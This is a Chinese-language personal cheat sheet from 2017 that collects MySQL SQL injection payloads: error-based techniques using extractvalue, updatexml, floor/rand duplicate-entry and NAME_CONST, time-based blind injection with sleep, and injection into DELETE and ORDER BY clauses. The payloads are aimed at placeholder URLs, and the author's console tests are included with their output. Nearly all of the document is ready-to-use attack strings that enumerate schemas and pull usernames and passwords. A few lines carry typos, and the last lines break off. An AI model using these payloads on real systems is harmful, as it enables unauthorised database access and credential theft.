
sql报错注入语句汇总(自己整理的)

2017年1月25日

一、extractvalue
www.vuln-web.com/index.php?view=-35″ union select 1,2,3,4,5–
www.vuln-web.com/index.php?view=-35″ and extractvalue(0x0a,concat(0x0a,(select database())))–
www.vuln-web.com/index.php?view=-35″ and extractvalue(0x0a,concat(0x0a,(select table_name from information_schema.tables where table_schema=database() limit 0,1)))–
www.vuln-web.com/index.php?view=-35″ and extractvalue(0x0a,concat(0x0a,(select column_name from information_schema.columns where table_schema=database() and table_name=’users’ limit 0,1)))–
www.vuln-web.com/index.php?view=-35″ and extractvalue(0x0a,concat(0x0a,(select count(username,0x3a,password) from users limit 0,1)))–


二、updatexml
www.vuln-web.com/index.php?view=-35″ union select 1,2,3,4,5–
www.vuln-web.com/index.php?view=-35″ and updatexml(null,concat(0x3a,(0x0a,(select database()))),null)–
http://127.0.0.1//report.php?id=1-111%27%20and%20updatexml(null,concat(0x3a,(select%20table_name%20from%20information_schema.tables%20where%20table_schema=database()%20limit%200,1)),null)–+
www.vuln-web.com/index.php?view=-35″ and updatexml(null,concat(0x3a,(select column_name from information_schema.columns where table_schema=database() and table_name=’users’ limit 0,1)),null)–
www.vuln-web.com/index.php?view=-35″ and updatexml(null,concat(0x3a,(select count(username) from users)),null)–
www.vuln-web.com/index.php?view=-35″ and updatexml(null,concat(0x3a,(select count(username,0x3a,password) from users limit 0,1)),null)–
三、floor
版本号:
mysql> select * from article where id = 1 and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
Method1:
mysql> select * from article where id = 1 and (select 1 from (select count(*),concat((select pass from admin where id =1),floor(rand(0)*2))x from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry ’admin8881′ for key ’group_key’
Method2:
mysql> select * from article where id = 1 and (select count(*) from (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),floor(rand(0)*2)));
ERROR 1062 (23000): Duplicate entry ’admin8881′ for key ’group_key’

mysql> SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT ‘x’))a from information_schema.tables group by a)b;
ERROR 1062 (23000): Duplicate entry ‘1x’ for key ‘group_key’

四、低版本
http://127.0.0.1//report.php?id=1-111%27%20and+1=(select+*+from+(select+NAME_CONST(version(),1),NAME_CONST(version(),1))+as+x)–+
五、
原型:www.vuln-web.com/photo.php?id=1′ and (select 1 from (Select count(*),Concat((<Your Query here to return single row>),0x3a,floor(rand (0) *2))y from information_schema.tables group by y) x)– –
www.vuln-web.com/photo.php?id=1′ and (select 1 from (Select count(*),Concat((select database()),0x3a,floor(rand(0)*2))y from information_schema.tables group by y) x)– –
www.vuln-web.com/photo.php?id=1′ and (select 1 from (Select count(*),Concat((select table_name from information_schema.tables where table_schema=database() limit 0,1),0x3a,floor(rand(0)*2))y from information_schema.tables group by y) x)– –
www.vuln-web.com/photo.php?id=1′ and (select 1 from (Select count(*),Concat((select column_name from information_schema.columns where table_schema=database() and table_name='<table_name_here>’ limit 0,1),0x3a,floor(rand(0)*2))y from information_schema.tables group by y) x)– –
www.vuln-web.com/photo.php?id=1′ and (select 1 from (Select count(*),Concat((select concat(<column_1>,<column_2>) from <table_name_here> limit 0,1),0x3a,floor(rand(0)*2))y from information_schema.tables group by y) x)– –

六、delete
delete from products where product_id=” or extractvalue(0x0a,concat(0x0a,(select database()))) and ”=”
delete from products where product_id=”” or (select 1 from (select count(*),Concat((select database()),0x3a,floor(rand(0)*2))y from information_schema.tables group by y)x) and “”=”” and password=’$passwrd’ limit 0,1
七、time-based injection
www.vuln-web.com/photo.php?id=1′ and (select sleep(10) from dual where database() like ‘_____’)# 利用_确定数据库长度
www.vuln-web.com/photo.php?id=1′ and (select sleep(10) from dual where (select table_name from information_schema.columns where table_schema=database() and column_name like ‘%pass%’ limit 0,1) like ‘%’)# 表名
www.vuln-web.com/photo.php?id=1′ and (select sleep(10) from dual where (select column_name from information_schema.columns where table_schema=database() and table_name=’users’ and column_name like ‘%username%’ limit 0,1) like ‘%’)# 字段
www.vuln-web.com/photo.php?id=1′ and (select sleep(10) from dual where (select password from users wehre username like ‘%admin%’ limit 0,1) like ‘%’)# 内容

——————-自己的测试
mysql> select * from is_num where id=’1112′ and (select sleep(10) from dual wher
e database() like ‘%’)#’;
-> ;
Empty set (10.00 sec)

mysql> select * from is_num where id=’1112′ and (select sleep(10) from dual wher
e database() like ‘_’);#’;
Empty set (0.00 sec)

mysql> select * from is_num where id=’1112′ and (select sleep(10) from dual wher
e database() like ‘____’);#’;
Empty set (10.00 sec)

mysql> select * from is_num where id=’1112′ and 1=(select length(database())=4);
#’;
+——+——+——+
| id | type | test |
+——+——+——+
| 1112 | NULL | NULL |
+——+——+——+
1 row in set (0.00 sec)

mysql> select * from is_num where id=’1112′ and 1=(select length(database())=3);
#’;
Empty set (0.00 sec)

mysql> select * from is_num where id=’1112′ and 1=(select length(database())=2);
#’;
Empty set (0.00 sec)

mysql> select * from is_num where id=’1112′ and 1=(select length(database())=4);
#’;
+——+——+——+
| id | type | test |
+——+——+——+
| 1112 | NULL | NULL |
+——+——+——+
1 row in set (0.00 sec)

mysql> select * from is_num where id=’1112′ and 1=(select sleep(10) from dual wh
ere length(database())=4);#’;
Empty set (10.00 sec)

mysql> select * from is_num where id=’1112′ and 1=(select sleep(10) from dual wh
ere length(database())=42);#’;
Empty set (0.00 sec)

———————————————————————————

八.order by && group by后注入点
select posts from content where submit=1 order by 1,extractvalue(0x0a,concat(0x0a,(select database())))# 爆库名
select posts from content where submit=1 order by 1,(select case when (1=1) then 1 else 1*(select table_name from information_schema.tables)end)=1# 1=1正常
select posts from content where submit=1 order by 1,(select case when (1=2) then 1 else 1*(select table_name from information_schema.tables)end)=1# 1=2错误
select posts from content where submit=1 order by 1,(select sleep(10) from dual where database() like database())# 时间盲注
select posts from content where submit=1 order by 1,
select posts from content where submit=1 order by 1,
